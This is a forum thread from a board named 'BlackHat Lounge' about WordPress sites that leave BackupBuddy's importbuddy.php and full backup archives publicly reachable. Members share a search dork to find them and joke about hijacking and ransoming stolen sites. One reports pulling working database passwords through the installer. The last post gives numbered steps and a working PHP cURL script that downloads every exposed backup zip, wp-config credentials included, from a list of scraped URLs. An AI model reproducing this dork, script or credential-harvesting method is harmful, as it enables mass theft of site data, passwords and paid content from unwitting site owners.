1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Some people are so dumb.. (wordpress related)

Discussion in 'BlackHat Lounge' started by IKbentim, Aug 5, 2011.

  1. IKbentim

    IKbentim Power Member

    Joined:
    Mar 14, 2009
    Messages:
    603
    Likes Received:
    655
    Just migrated one of my wordpress sites using backupbuddy (which is great by the way) so it uses a file called importbuddy.php to load the backup onto the new server.

    So decided to google "/importbuddy.php" and guess what.. a lot of people forget to delete their backups.. hundreds of site backups ready to scoop up.

    The script warns you like 200.000 times!

    Google the phrase 'BackupBuddy importbuddy.php by PluginBuddy.com'
     
    • Thanks Thanks x 1
    Last edited: Aug 5, 2011
  2. kez1000

    kez1000 Supreme Member

    Joined:
    Jul 24, 2009
    Messages:
    1,402
    Likes Received:
    1,340
    Location:
    UK
    thats crazy........;)
    so you can bacically take the backup and us the website for yourself -
    Dup content? - do you think google will index it again under a different URL
    if you took the site
     
  3. IKbentim

    IKbentim Power Member

    Joined:
    Mar 14, 2009
    Messages:
    603
    Likes Received:
    655
    You can upload their site to a diff domain and then rank it higher and sell the domain to them :eek:
     
    • Thanks Thanks x 1
  4. kez1000

    kez1000 Supreme Member

    Joined:
    Jul 24, 2009
    Messages:
    1,402
    Likes Received:
    1,340
    Location:
    UK
    hahahah for real LOL
     
  5. ronywilliam

    ronywilliam Senior Member

    Joined:
    Jan 20, 2011
    Messages:
    1,150
    Likes Received:
    431
    ^^ jeez thats brilliant! :p ... Good thing is only advanced WP site owners would be using the plugin! ;)
     
  6. IKbentim

    IKbentim Power Member

    Joined:
    Mar 14, 2009
    Messages:
    603
    Likes Received:
    655
    It's mostly niche sites lol
     
  7. Frogserv

    Frogserv Regular Member

    Joined:
    Jun 21, 2011
    Messages:
    376
    Likes Received:
    180
    Occupation:
    Entrepreneur
    Location:
    Paris, FR
    Nice tips :cool:
    Be sure to delete your zip files, there are ALL the files (wp-config.php with password...).
     
  8. FuryKyle

    FuryKyle Jr. VIP Jr. VIP Premium Member

    Joined:
    Nov 19, 2010
    Messages:
    2,395
    Likes Received:
    1,369
  9. ┼blackrat┼

    ┼blackrat┼ Senior Member

    Joined:
    Jul 31, 2010
    Messages:
    899
    Likes Received:
    729
    Location:
    Sewer

    Seo20´s rewriting tool springs to mind.
     
  10. Frogserv

    Frogserv Regular Member

    Joined:
    Jun 21, 2011
    Messages:
    376
    Likes Received:
    180
    Occupation:
    Entrepreneur
    Location:
    Paris, FR
    This thread is already indexed in GG :D
     
  11. IKbentim

    IKbentim Power Member

    Joined:
    Mar 14, 2009
    Messages:
    603
    Likes Received:
    655
    The problem with backup buddy is that it backups your entire site and not just wordpress.. so some people offer a guide or product on their site and its also in the backup.
     
  12. Frogserv

    Frogserv Regular Member

    Joined:
    Jun 21, 2011
    Messages:
    376
    Likes Received:
    180
    Occupation:
    Entrepreneur
    Location:
    Paris, FR
    Scraped 543 URLs
    Now, php sript to download zip files :x
     
  13. IKbentim

    IKbentim Power Member

    Joined:
    Mar 14, 2009
    Messages:
    603
    Likes Received:
    655
    lol:D
     
  14. ronywilliam

    ronywilliam Senior Member

    Joined:
    Jan 20, 2011
    Messages:
    1,150
    Likes Received:
    431
    ^^ share that when done :p
     
  15. Frogserv

    Frogserv Regular Member

    Joined:
    Jun 21, 2011
    Messages:
    376
    Likes Received:
    180
    Occupation:
    Entrepreneur
    Location:
    Paris, FR
    I'm better with scrapebox than with php ^^
     
  16. ExobiT

    ExobiT Junior Member

    Joined:
    Apr 21, 2008
    Messages:
    145
    Likes Received:
    25
    Try choosing the "install on this server" and press next, you can get the DB info and everything to the host. I tried with 10 now, and 2 of them the pass for the DB was working ^^
     
  17. kez1000

    kez1000 Supreme Member

    Joined:
    Jul 24, 2009
    Messages:
    1,402
    Likes Received:
    1,340
    Location:
    UK
    When you get the DB password what do you do with it?
     
  18. Frogserv

    Frogserv Regular Member

    Joined:
    Jun 21, 2011
    Messages:
    376
    Likes Received:
    180
    Occupation:
    Entrepreneur
    Location:
    Paris, FR
    Here we are :


    1. scrape the Urls : site:*/importbuddy.php
    2. put the urls on a file called backupbuddyURL.txt
    3. put this code on a PHP file
    4. Change PATHOFYOURFOLDER
    5. put the PHP & TXT file on the same folder
    6. run this script
    7. enjoy :D
    PHP:
    <?php
    ini_set
    ("max_execution_time"0);


    $file fopen("backupbuddyURL.txt""r") or exit("Unable to open file!");
    while(!
    feof($file))
        {
        
    $url fgets($file);
        if((
    $url != '') && (stripos($url,'importbuddy.php') ))
            {
            
    $userAgent="Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2";
            
            
    // make the cURL request to $target_url
            
    $ch curl_init();
            
    curl_setopt($chCURLOPT_URL$url);
            
    curl_setopt($chCURLOPT_HEADER1);
            
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
            
    curl_setopt($chCURLOPT_CONNECTTIMEOUT30);
            
    curl_setopt($chCURLOPT_REFERER'http://www.google.com/');
            
    curl_setopt($chCURLOPT_USERAGENT$userAgent);

            
    curl_setopt($chCURLOPT_FRESH_CONNECTtrue);
            
    curl_setopt($chCURLOPT_FAILONERRORtrue);
            
    curl_setopt($chCURLOPT_AUTOREFERERtrue);
            
    curl_setopt($chCURLOPT_TIMEOUT30);
            
    $htmlcurl_exec($ch);
            
    /*
            if (!$html) {
                echo "<br />cURL error number:" .curl_errno($ch);
                echo "<br />cURL error:" . curl_error($ch);
                }
            */
            // parse the html into a DOMDocument
            
    $dom = new DOMDocument();
            @
    $dom->loadHTML($html);
            
    //discard white space 
            
    $dom->preserveWhiteSpace false
            
            
    $option $dom->getElementsByTagName('option');
            foreach (
    $option as $tag)
                {
                    
    $value $tag->childNodes->item(0)->nodeValue;
                    if(
    stripos($value,'.zip') !== false) {
                        
        
                    
    $host substr($url,0,strripos($url,'/'));
                    
    $url $host.'/'.$value;
                    
                    
    $path '/PATHOFYOURFOLDER/'.$value;
                 
                    
    $fp fopen($path'w');
                 
                    
    $ch curl_init($url);
                    
    curl_setopt($chCURLOPT_FILE$fp);
                 
                    
    $data curl_exec($ch);
                 
                    
    curl_close($ch);
                    
    fclose($fp);    
                    }
                }
            }
        }


    ?>